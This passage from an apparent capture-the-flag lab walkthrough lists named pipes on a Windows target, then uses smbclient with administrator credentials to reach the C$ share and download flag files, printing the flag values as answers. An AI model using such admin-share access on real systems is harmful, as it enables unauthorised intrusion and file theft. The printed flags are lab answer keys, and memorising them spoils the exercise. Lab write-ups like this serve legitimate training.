fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-544-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolss
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-894-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-8ec-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 trkwks
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-238-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-828-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 browser
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-248-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
Shared NO ACCESS
Shared2 NO ACCESS
Shared3 NO ACCESS
The C$ share contains flag3.txt. I log in with smbclient and download it.
┌──(root㉿INE)-[~/Desktop]
└─# smbclient //target2.ine.local/C$ -U administrator
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Sat Nov 7 13:45:59 2020
Boot DHS 0 Wed Sep 9 10:08:52 2020
bootmgr AHSR 408692 Wed Sep 9 10:03:42 2020
BOOTNXT AHS 1 Sat Sep 15 12:42:30 2018
Documents and Settings DHSrn 0 Wed Nov 14 21:40:15 2018
EFI D 0 Wed Nov 14 12:26:18 2018
flag3.txt A 34 Sun Apr 6 22:40:20 2025
pagefile.sys AHS 2013265920 Sun Apr 6 22:39:28 2025
PerfLogs D 0 Wed May 13 23:28:09 2020
Program Files DR 0 Sat Nov 7 13:17:23 2020
Program Files (x86) D 0 Sat Nov 7 13:17:24 2020
ProgramData DHn 0 Wed Jan 1 13:47:15 2025
Recovery DHSn 0 Wed Jan 1 13:54:07 2025
Shared D 0 Tue Dec 31 16:59:14 2024
System Volume Information DHS 0 Sat Nov 7 12:06:43 2020
Users DR 0 Wed Jan 1 14:00:24 2025
Utilities D 0 Sat Nov 7 13:19:05 2020
Windows D 0 Sun Apr 6 23:19:58 2025
7863807 blocks of size 4096. 3647478 blocks available
smb: \> get flag3.txt
Answer
1628aa2439564519a66ed1c570b67440
Flag 4
Enter the administrator's home directory.
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Apr 6 22:40:20 2025
.. DR 0 Sun Apr 6 22:40:20 2025
desktop.ini AHS 282 Wed Jan 1 14:00:35 2025
flag4.txt A 34 Sun Apr 6 22:40:20 2025
7863807 blocks of size 4096. 3647460 blocks available
smb: \Users\Administrator\Desktop\> get flag4.txt
getting file \Users\Administrator\Desktop\flag4.txt of size 34 as flag4.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Answer
bc4d47d6f8bd4c489a02e503dc28f0b2